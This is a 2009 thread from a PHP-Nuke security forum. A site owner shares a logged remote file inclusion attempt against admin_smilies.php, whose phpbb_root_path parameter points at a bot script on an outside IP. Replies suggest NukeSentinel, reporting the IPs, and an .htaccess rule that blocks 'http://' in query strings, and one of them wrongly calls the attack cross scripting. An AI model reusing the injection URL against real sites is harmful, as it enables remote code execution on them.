Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
gazj
Worker
Worker


Joined: Apr 28, 2006
Posts: 152
Location: doncaster england

PostPosted: Sun Sep 20, 2009 6:18 pm Reply with quote

i have an error log on my site to aid me in missing files images see who was trying what url and so on and i came accross these in my logs you have to take the spaces out as it wouldnt let me post

nunuke.co.uk/modules/Forums / admin/admin_smilies.php? phpbb_root_path = http :// 200.209.69.194 /bot / fx29id.txt ? ?

now if you visit Only registered users can see links on this board! Get registered or login!
you will see a list of hacking txt file tools does anybody know of anyway to getmy own back in someway i searched the ip and its in brazil but they are using another ip located on U.S hosting to act as the ip to visit my site i am not very clued up at what any of these files do but looking at one it looks like it trys to access the hosting info and grab passwords and hijack it and store txt files

im not worried about this find as my error log spits a 403 at them but what would it do if i had the error logging off?? who knows but i dont wonna find out
 
View user's profile Send private message Visit poster's website
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Sun Sep 20, 2009 9:11 pm Reply with quote

There are automated bot tools... lots are out there. I'm not sure what you want to do. These attempts should be blocked by NukeSentinel.

You can try and report those IPs to their host. Some of them will respond while others just won't.

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
slackervaara
Worker
Worker


Joined: Aug 26, 2007
Posts: 236

PostPosted: Sun Sep 20, 2009 10:26 pm Reply with quote

It is cross scripting, which you can block also in .htaccess by this:

RewriteEngine On

RewriteCond %{QUERY_STRING} .*http:\/\/.* [OR]
RewriteCond %{QUERY_STRING} .*http%3A%2F%2F.*
Rewriterule ^.* - [F]
 
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©